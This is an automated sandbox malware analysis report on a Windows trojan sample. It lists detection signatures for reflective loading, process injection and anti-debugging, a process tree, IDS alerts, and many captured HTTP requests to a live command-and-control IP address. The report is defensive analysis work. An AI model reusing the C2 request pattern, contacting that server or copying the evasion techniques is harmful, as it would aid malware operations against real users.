Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1731043030539.exe

Overview

General Information

Sample name:1731043030539.exe
Analysis ID:1583249
MD5:0ffa0039c3e96e4b95293b09db72cd85
SHA1:1b5cc84e46e0c6c40ce64c5d6a18885084da3256
SHA256:f747fb3f504a9c6b9e83162331951407fdb6d1e9afdfb7955821f2aca03f172b
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected ReflectiveLoader
AI detected suspicious sample
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1731043030539.exe (PID: 576 cmdline: "C:\Users\user\Desktop\1731043030539.exe" MD5: 0FFA0039C3E96E4B95293B09DB72CD85)
    • svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • control.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\control.exe MD5: EBC29AA32C57A54018089CFC9CACAFE8)
      • fontview.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\fontview.exe MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)
      • resmon.exe (PID: 3376 cmdline: C:\Windows\SysWOW64\resmon.exe MD5: 29C52C15D2D68A4BBE9A36701D31100E)
      • BackgroundTransferHost.exe (PID: 6404 cmdline: C:\Windows\SysWOW64\BackgroundTransferHost.exe MD5: 0E57CCE96CEE6080C8CB279836EB712C)
      • raserver.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1731043030539.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
    1731043030539.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
    • 0xabe9a:$s1: _ReflectiveLoader@
    • 0xabe9b:$s2: ReflectiveLoader@
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
        00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
          00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
            00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
              Click to see the 31 entries
              SourceRuleDescriptionAuthorStrings
              8.3.resmon.exe.23007f8.0.raw.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                8.3.resmon.exe.23007f8.0.raw.unpackWiltedTulip_ReflectiveLoaderDetects reflective loader (Cobalt Strike) used in Operation Wilted TulipFlorian Roth
                  8.3.resmon.exe.23007f8.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                  • 0x873ca:$s1: _ReflectiveLoader@
                  • 0x873cb:$s2: ReflectiveLoader@
                  1.2.svchost.exe.1ad8b7f0000.6.raw.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                    1.2.svchost.exe.1ad8b7f0000.6.raw.unpackWiltedTulip_ReflectiveLoaderDetects reflective loader (Cobalt Strike) used in Operation Wilted TulipFlorian Roth
                      Click to see the 85 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1731043030539.exe", ParentImage: C:\Users\user\Desktop\1731043030539.exe, ParentProcessId: 576, ParentProcessName: 1731043030539.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, ProcessId: 6568, ProcessName: svchost.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1731043030539.exe", ParentImage: C:\Users\user\Desktop\1731043030539.exe, ParentProcessId: 576, ParentProcessName: 1731043030539.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p, ProcessId: 6568, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T09:28:27.682748+010020221121Exploit Kit Activity Detected192.168.2.54970547.76.199.21880TCP
                      2025-01-02T09:28:33.248489+010020221121Exploit Kit Activity Detected192.168.2.54970647.76.199.21880TCP
                      2025-01-02T09:28:38.748633+010020221121Exploit Kit Activity Detected192.168.2.54970747.76.199.21880TCP
                      2025-01-02T09:28:44.165363+010020221121Exploit Kit Activity Detected192.168.2.54971247.76.199.21880TCP
                      2025-01-02T09:28:56.455947+010020221121Exploit Kit Activity Detected192.168.2.54978047.76.199.21880TCP
                      2025-01-02T09:29:01.859281+010020221121Exploit Kit Activity Detected192.168.2.54981547.76.199.21880TCP
                      2025-01-02T09:29:07.263497+010020221121Exploit Kit Activity Detected192.168.2.54985047.76.199.21880TCP
                      2025-01-02T09:29:12.685796+010020221121Exploit Kit Activity Detected192.168.2.54988347.76.199.21880TCP
                      2025-01-02T09:29:24.663598+010020221121Exploit Kit Activity Detected192.168.2.54995647.76.199.21880TCP
                      2025-01-02T09:29:30.062263+010020221121Exploit Kit Activity Detected192.168.2.54998747.76.199.21880TCP
                      2025-01-02T09:29:35.492858+010020221121Exploit Kit Activity Detected192.168.2.54998847.76.199.21880TCP
                      2025-01-02T09:29:40.889568+010020221121Exploit Kit Activity Detected192.168.2.54998947.76.199.21880TCP
                      2025-01-02T09:29:51.235726+010020221121Exploit Kit Activity Detected192.168.2.54999247.76.199.21880TCP
                      2025-01-02T09:29:56.827496+010020221121Exploit Kit Activity Detected192.168.2.54999347.76.199.21880TCP
                      2025-01-02T09:30:02.466649+010020221121Exploit Kit Activity Detected192.168.2.54999447.76.199.21880TCP
                      2025-01-02T09:30:07.874318+010020221121Exploit Kit Activity Detected192.168.2.54999547.76.199.21880TCP
                      2025-01-02T09:30:20.103478+010020221121Exploit Kit Activity Detected192.168.2.54999747.76.199.21880TCP
                      2025-01-02T09:30:25.498305+010020221121Exploit Kit Activity Detected192.168.2.54999847.76.199.21880TCP
                      2025-01-02T09:30:30.908500+010020221121Exploit Kit Activity Detected192.168.2.54999947.76.199.21880TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1731043030539.exeAvira: detected
                      Source: 1731043030539.exeVirustotal: Detection: 61%Perma Link
                      Source: 1731043030539.exeReversingLabs: Detection: 65%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 1731043030539.exeJoe Sandbox ML: detected
                      Source: 1731043030539.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: F:\8QProject\process_x64\x64\Release\process_x64_dll.pdb source: 1731043030539.exe
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_00000001800024D0 FindFirstFileA,_time64,FindNextFileA,wsprintfA,FindNextFileA,1_2_00000001800024D0
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfm*BM8ui63qGw1hOYc0Maww2aCZlGFx2c*WqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6**Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfb*fRmwgZ5cGzSva*FX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoV*Ov87GDYU96jq0srfmNJ*L5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pN*JsxbItKeA*DsMEI= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRB*Sycwp2sHLkg*ahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3N*M3W*aD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjB*W1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82*Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZs*drjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PX*FHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49707 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49706 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49712 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49705 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49780 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49815 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49850 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49883 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49956 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49987 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49993 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49989 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49988 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49998 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49999 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49992 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49994 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49995 -> 47.76.199.218:80
                      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.5:49997 -> 47.76.199.218:80
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001D145 recvfrom,WSAGetLastError,_memcmp,sendto,inet_ntoa,closesocket,3_2_1001D145
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUf*i9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL4*8d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7*brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXa*YTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfm*BM8ui63qGw1hOYc0Maww2aCZlGFx2c*WqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSY*QJSm*Ua4R0nKTUopxtu5aRZUmxtV*TsHV29kf7cYL-MjTc*kRfIpjTbB7xzYWtqF*O5vPdazU9kHSC8*d0RJwPJPGxrPzKc6**Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfb*fRmwgZ5cGzSva*FX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoV*Ov87GDYU96jq0srfmNJ*L5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pN*JsxbItKeA*DsMEI= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=rzFF8CF3nR2uBDTXa1dRB*Sycwp2sHLkg*ahbNYN1YCtMEvMDGfRg6JOn3ruHXc8o3N*M3W*aD1dNXf0RgkRbMxSQ-H6flMFA6epDsoU7J5lszQTKrRqwxpQiLuqXUBReGTnrx3zKRLwmddifMNoTFN5UPTNAlHGR7ZET6JoCuTkfmg25v5NfHejoxaRK3MJXB-kxeC8EXo86ufoEwJDBZ0YSyPVb187fRMrEsv98eZc3VzEm5jYhOnRaVHVPJIJu3VXi7efKDFzmUmEadB2kvhr4b6LDN6*7EvnQ711qTV-6DBxDbjTha0oYb8MNfPWDfiAJDK7Vh4kTGNE-Pd93SwqWoTbTib258IG4Cih5PIqc1D5GQSGoS4yMsZ5R313wyOFatSdhLrIN2c3W1PA-jU7GXVAV0sjibBZrNgSIco= HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 508
                      Source: global trafficHTTP traffic detected: GET http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590 HTTP/1.1Host: 47.76.199.218:80Content-type: application/x-www-form-urlencodedAccept: text/plainContent-Length: 85
